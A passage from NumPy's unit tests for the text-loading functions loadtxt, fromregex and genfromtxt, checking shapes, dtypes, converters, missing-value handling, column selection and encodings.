c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
def test_none_as_string(self):
# gh-5155, None should work as string when format demands it
c = TextIO()
c.write('100,foo,200\n300,None,400')
c.seek(0)
dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
np.loadtxt(c, delimiter=',', dtype=dt, comments=None) # Should succeed
@pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
reason="Wrong preferred encoding")
def test_binary_load(self):
butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
b"20,2,3,\xc3\x95scar\n\r"
sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
with temppath() as path:
with open(path, "wb") as f:
f.write(butf8)
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode_)
assert_array_equal(x, sutf8)
# test broken latin1 conversion people now rely on
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype="S")
x = [b'5,6,7,\xc3\x95scarscar', b'15,2,3,hello', b'20,2,3,\xc3\x95scar']
assert_array_equal(x, np.array(x, dtype="S"))
def test_max_rows(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_max_rows_with_skiprows(self):
c = TextIO()
c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
def test_max_rows_with_read_continuation(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
# test continuation
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([2,1,4,5], int)
assert_array_equal(x, a)
def test_max_rows_larger(self):
#test max_rows > num rows
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=6)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
assert_array_equal(x, a)
class Testfromregex(object):
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
def test_record_unicode(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')
dt = [('num', np.float64), ('val', 'U4')]
x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
(4.444, 'qux')], dtype=dt)
assert_array_equal(x, a)
regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
x = np.fromregex(path, regexp, dt, encoding='UTF-8')
assert_array_equal(x, a)
def test_compiled_bytes(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
dt = [('num', np.float64)]
a = np.array([1, 2, 3], dtype=dt)
x = np.fromregex(c, regexp, dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
# Test w/ explicit dtype
data = TextIO('1 2\n3 4')
test = np.genfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.genfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
# Test outputting a standard ndarray
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
# Test squeezing to 1D
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.genfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
# Test the stripping of comments
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
# Test row skipping
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.genfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
# Test retrieving a header
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None, names=True)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
# Test the automatic definition of the output dtype
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
# Tests whether the output dtype can be uniformized
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.genfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
# Test overwriting the names of the dtype
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.genfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
# Check that names can be retrieved even if the line is commented out.
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test, ctrl)
def test_names_and_comments_none(self):
# Tests case when names is true but comments is None (gh-10780)
data = TextIO('col1 col2\n 1 2\n 3 4')
test = np.genfromtxt(data, dtype=(int, int), comments=None, names=True)
control = np.array([(1, 2), (3, 4)], dtype=[('col1', int), ('col2', int)])
assert_equal(test, control)
def test_file_is_closed_on_error(self):
# gh-13200
with tempdir() as tmpdir:
fpath = os.path.join(tmpdir, "test.csv")
with open(fpath, "wb") as f:
f.write(u'\N{GREEK PI SYMBOL}'.encode('utf8'))
# ResourceWarnings are emitted from a destructor, so won't be
# detected by regular propagation to errors.
with assert_no_warnings():
with pytest.raises(UnicodeDecodeError):
np.genfromtxt(fpath, encoding="ascii")
def test_autonames_and_usecols(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
# Test the combination user-defined converters and usecol
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None,
converters={'C': lambda s: 2 * int(s)})
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
# Test the conversion to datetime.
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
# Test the conversion to datetime64.
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
# Test whether unused converters are forgotten
data = TextIO("1 21\n 3 42\n")
test = np.genfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.genfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
# Test some corner cases
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
names=None, converters=conv)
control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
assert_equal(test, control)
dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
usecols=(0,1,3), names=None, converters=conv)
control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
assert_equal(test, control)
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
ndtype = [('nest', [('idx', int), ('code', object)])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
# nested but empty fields also aren't supported
ndtype = [('idx', int), ('code', object), ('nest', [])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
def test_userconverters_with_explicit_dtype(self):
# Test user_converters w/ explicit (standard) dtype
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: np.compat.unicode},
encoding='UTF-8')
control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
dtype=[('', '|U11'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
# Test space delimiter
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.genfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
# Test using an integer for delimiter
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
# Test w/ a delimiter tab
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
# Test the selection of columns
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
# Test giving usecols with a comma-separated string
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
# Test usecols with an explicit structured dtype
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.genfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
# Test usecols with an integer
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
# Test usecols with named columns
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
# Test that an empty file raises the proper warning.
with suppress_warnings() as sup:
sup.filter(message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
# when skip_header > 0
test = np.genfromtxt(data, skip_header=1)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',', usemask=True)
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.genfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.genfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.genfromtxt(data, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', float), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.genfromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, usemask=True, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
usemask=True,
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
# Test with missing and filling values
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
data2 = "1,2,*,4\n5,*,7,8\n"
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=0)
ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=-1)
ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.genfromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True, usemask=True)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
# Test masked column
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
# Test masked column
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
# Test invalid raise
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.genfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.genfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
# Test invalid_raise with usecols
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.genfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.genfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
# Test inconsistent dtype
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x.decode()}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
# Test default format
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
